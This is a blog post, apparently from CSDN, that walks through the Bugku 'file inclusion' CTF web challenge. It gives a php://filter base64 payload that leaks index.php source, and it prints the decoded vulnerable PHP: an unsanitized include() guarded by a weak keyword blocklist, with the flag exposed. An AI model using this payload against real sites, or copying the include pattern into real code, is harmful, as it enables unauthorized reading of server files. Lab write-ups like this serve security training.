Bugku文件包含WP

已于 2022-08-20 09:30:52 修改
阅读量1k 收藏
点赞数
分类专栏: 学习笔记 文章标签: php 安全 开发语言
于 2022-08-20 09:29:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlw_xx/article/details/126435923
版权

Bugku文件包含

构造payload: php://filter/read=convert.base64-encode/resource=index.php
页面会返回base64加密后的index.php内容,
77u/PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LXdlYjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2FjMzJlZDJhYmU4OGEzMjk0MzRlYjI0NjlkNWRhOTQwfQ0KPz4NCjwvaHRtbD4NCg==
在这里插入图片描述

<html>
    <title>Bugku-web</
   
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{ac32ed2abe88a329434eb2469d5da940}
?>
</html>
wlw_xx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugku 文件包含
weixin_74020633的博客
09-27 262
点击后,跳转到一个index页面,并且url后有flag=show.php,根据搜索知道这是典型的文件包含问题(虽然这里题目提示是文件包含了)之后尝试改为flag=index,发现不对。在开发过程中,当频繁需要跳转网页,或者需要某个函数时,程序员喜欢将重复的函数写道一个单独的文件中,在需要时调用文件,这种文件调用叫做文件包含。当调用的不是函数,而是一个文件时,就相当于把这个文件变了变量,也就给了用户操控参数的机会,就可能造成文件包含漏洞。通常获取源代码时,伪协议将xxx.php当文件执行,
bugku题解-文件包含
qq_51775369的博客
10-15 1008
访问目标地址 发现有一个链接,点击,发现跳转到/index.php?file=show.php 之后就想到文件包含可以使用PHP伪协议,php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 在url后改为?file=php://filter/read=convert.base64-encode/resource=index.php发现显示了base64编码的字符串...
BUGKU-WEB 文件包含
最新发布
天泽岁月
02-22 1331
BUGKU-WEB 文件包含PHP伪协议
Bugku题目Crypto密码部分wp(持续更新)
苦行僧的妖孽日常
11-02 618
Bugku题目Crypto密码部分
bugku杂项题writeup
11-22
bugku杂项题writeup
WordPress配置文件wp-config.php详解
09-29
主要介绍了WordPress配置文件wp-config.php详解,包含很多控制Wordpress的技巧,需要的朋友可以参考下
读取XML文件示例源码WP7
04-02
这是可以实现读取XML文件示例源码WP7,并且还可以加载XML文件,该源码只要是介绍了如何在Silverlight for Windows Phone中读取XML文件使用Linq To XML来读取XML中的节点信息,首先通过XElement.Load方法加载整个流,...
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku笔记刷题目的整理
04-12
自己刷bug库题库的一些笔记整理,所有题应该都有吧基本上
bugku-渗透测试1通关 wp
qq_45414878的博客
10-13 4904
bugku 渗透测试1 靶场通关手册,祝你快速通关!
Bugku-WEB-计算器(WP
m0_73005107的博客
11-27 366
打开场景发现是一个计算器,需要我们输入正确答案即可获得flag,查看源代码(按Ctrl+u),逐行浏览发现“maxlength=1”。按F12对源代码进行编辑,将maxlength的值修改,修改完成后再次输入计算结果得到flag
[Bugku-web-文件包含]自己的wp
m0_61774166的博客
02-01 2392
主界面 首先打开靶机, 映入眼帘的就是一个超链接,抱着试一试的态度点进去,进入到了如下的界面 提示出现了另一个文件,尝试进入文件看看,一进去发现还是刚才的样子,什么都没有变,和第一一张图一模一样,于是开始思考,是否文件具有无法显示的特性,于是找到这篇关于ctf中文件包含漏洞的文章,在其中找到了这一段 来自博客:(14条消息) CTF中文件包含漏洞总结_Lethe's Blog-CSDN博客_文件包含漏洞 遂采用如上文所示第二种方法,使用php://filter协议进行查看,得到一段以..
BUGKU WP-signin
m0_55631425的博客
05-08 389
将.apk文件转化为zip压缩包,解压(apk为andior应用软件如果转化为zip或rar打不开或缺少软件可以apktools解压) 打开后从上到下分别是,程序的签名文件夹,资源文件夹,权限与窗体(Activity)声明文件,classes.dex,程序代码部分在这里面(众所周知的是,这也是一个压缩包),还有最后一个依旧还是资源文件,不过里面放着我们的字符串资源啦(翻译的时候就用他)。 可以从字符串资源resources.arsc入手,但能找到的实在是太多了,试着翻一下classes.dex文件 再使
bugku web部分 wp
qq_49354488的博客
10-24 897
文章目录MD5解密输入长度限制绕过第一个if判断正则匹配数组绕过堆叠注入暴力破解暴力破解验证码绕过绕过前端验证暴力破解BugkuCTFWEB 2计算器web基础$_GETweb基础$_POST矛盾WEB 3域名解析你必须让他停下本地包含变量1web 5头等舱网站被黑管理员系统WEB 4flag在index里输入密码查看flag点击一百万次备份是个好习惯成绩单秋名山老司机速度要快Cookie欺骗never give upwelcome to bugkuctf过狗一句话字符?正则?前女友(SKCTF)login
Bugku 逆向WP(1)
John_lain的博客
11-10 1941
文章目录Bugku 逆向入门逆向Easy_vbEasy_Re游戏过关Timer(阿里CTF)逆向入门loveLoopAndLoop(阿里CTF)easy-100(LCTF) Bugku 逆向 2018-11-7 19:05:10 今天开始刷题了. 入门逆向 题目非常简单.用IDA直接看汇编代码,会发现printf函数后面有很多mov指令,这里就是flag. 建议不要直接F5,因为F5后看不到mov...
bugku 好多数值WP
ZKCQM23的博客
04-11 1757
emmmm...找了两个,总结起来吧,就是好像是题目是有相似的,那个TXT文件没有传完整(我做的好多题文件好像都不完整,和很多WP解起来都不符合)不过大家都是学知识的,这个倒无所谓。把两个WP贴出来吧,别的博主写的,侵删。12把1的flag输入,正确。。。。...
有道云笔记 渗透测试文件上传核题wp
10-12
针对有道云笔记的文件上传漏洞,常见的测试方法包括: 1. 尝试上传各种类型的文件:测试能否上传系统可执行文件、脚本文件或者危险的文件类型。 2. 绕过后台验证:尝试修改请求报文、绕过文件类型检查、篡改上传文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值